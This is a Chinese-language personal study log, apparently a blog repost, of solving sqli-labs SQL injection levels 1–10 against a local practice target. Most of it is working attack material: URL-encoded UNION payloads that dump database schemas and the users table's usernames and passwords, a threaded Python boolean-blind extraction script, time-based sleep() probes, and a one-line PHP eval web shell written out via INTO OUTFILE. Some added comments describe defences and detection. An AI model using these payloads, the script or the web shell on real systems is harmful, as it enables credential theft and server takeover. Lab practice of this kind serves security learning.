個人學習-SQL 記錄
阿新 • 發佈:2018-11-16
1-5
''' 進資料庫之前還會解碼,但 SQL 語法中的語句不會,因此 str 需要 hex。Python 的 hex:先做 ascii 轉換,再轉 hex。 第一關 CONCAT_WS(sep,s1,s2...,sn)將s1,s2...,sn連線成字串,並用sep字元間隔 concat_ws(@@version,database(),user()) 獲取所有資料庫名 select 1,2,(select group_concat(schema_name) from information_schema.schemata)# 得到 基本資訊 union select 1,concat_ws(0x7C,@@version,database(),0x757365722829),3 # 資料庫 hex 0x736563757269747927. 得表名 %27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%20%20%23 得欄位名 id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%20%20%23 得資料: ’ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23 第三關 id=-1')order by 3 %23 爆欄位 id=-1%27)union%20select%201,2,3%20%23 基本資訊: id=-1%27)union%20select%201,(select%20concat_ws(database(),@@version,user())),3%20%23 得表名 -1%27)union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%23 得欄位名: id=-1%27)union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3 第四關: 爆出欄位 http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 # 然後 (select group_concat(table_name) from information_schema.tables where table_schema=(select database())) 最後 得資料 select group_concat() from
6-9
import requests
''' 第6關 http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 0 or (length(database())=8) # '''
''' 第7關 http://127.0.0.1/sqli-labs-master/Less-7/?id=2%27))%20and%200%20or%20(length(database())=8)%23 '''
''' 第8關 完整 '''
# Level 8 of the sqli-labs practice target (localhost). The page never returns the
# queried data itself; the check below keys on a fixed "You are in" marker that the
# lab prints when the injected condition is true, so the script infers one character
# per request (boolean-based blind injection).
# Defender's view: the root cause is the `id` parameter being concatenated into the
# query; a parameterised query removes the whole class. The traffic pattern is also a
# strong detection signal: main(218) x 97 candidates is ~21k near-identical GETs to a
# single endpoint whose `id` value carries `ascii(substr(` / `information_schema`
# fragments.
import requests
from multiprocessing.dummy import Pool

# Characters recovered so far. Shared across pool workers; each hit appends to it in
# completion order (worker scheduling), not in position order.
messagr = []

# database name
#poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select database()),%d,1))=%d)'
# table names, 29
# 29 chars: http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29)#
poc = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or " + '(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d)'
# column names, 20
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()))=122) #
poc = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or " + '(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),%d,1))=%d)'
# data: 218 characters
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(id,0x7c,username,0x7c,password) from security.users))=218) #
# Only this last assignment is in effect when main() runs; the two templates above are
# overwritten, so re-running for tables/columns means re-ordering these lines by hand.
poc = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or" + ' (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users),%d,1))=%d)'


def expoit(start, num, poc):
    """Send one probe: "is character `start` of the target string equal to byte `num`?"

    start -- 1-based position handed to substr()
    num   -- candidate byte value (main() tries 31..127)
    poc   -- URL template with two %d slots, filled with (start, num)

    On a hit the character is appended to the module-level `messagr` list and the
    running string is printed. There is no error handling: requests.get() exceptions
    propagate out of the worker, and because main() never calls .get() on the
    AsyncResult they are silently dropped, so a dead target just yields no output.
    """
    poc = poc.replace('%20', ' ')
    # Fill the template, then append URL-encoded " #" so the remainder of the original
    # query is commented out.
    poc = poc % (start, num) + '%20%23'
    # print(poc)
    response = requests.get(poc)
    if 'You are in' in response.text:
        messagr.append(chr(num))
        print('資料庫:', ''.join(messagr))


def main(starts):
    """Enqueue one probe per (position, candidate byte) pair and wait for all to finish.

    starts -- number of character positions to recover; main(218) below matches the
              218-character length measured in the comment above

    Reads the module-level `poc` (the users-table template, the last one assigned).
    Pool() with no argument sizes itself to the CPU count; every probe is a thread
    (multiprocessing.dummy), so all requests hit the target concurrently.
    """
    pool = Pool()
    for start in range(1, starts + 1):
        for num in range(31, 128):  # candidate byte values 31..127
            pool.apply_async(expoit, args=(start, num, poc))
    pool.close()
    pool.join()


if __name__ == '__main__':
    main(218)

# Note-to-self string below: INTO OUTFILE needs the FILE privilege and a writable
# secure_file_priv location. Hardening both (no FILE grant for the application account,
# secure_file_priv set) is what closes this path on a real deployment.
''' select "<?php @eval($_POST['giantbranch']);?>" into outfile 
"XXX\test.php" '''
# Levels 9/10 have no visible marker at all, so the note switches to timing
# (sleep()). Detection-wise these show up as response-time spikes and slow-query
# log entries on an endpoint that is normally fast.
''' 9 10 無回顯,只能sleep()來測試 http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23 '''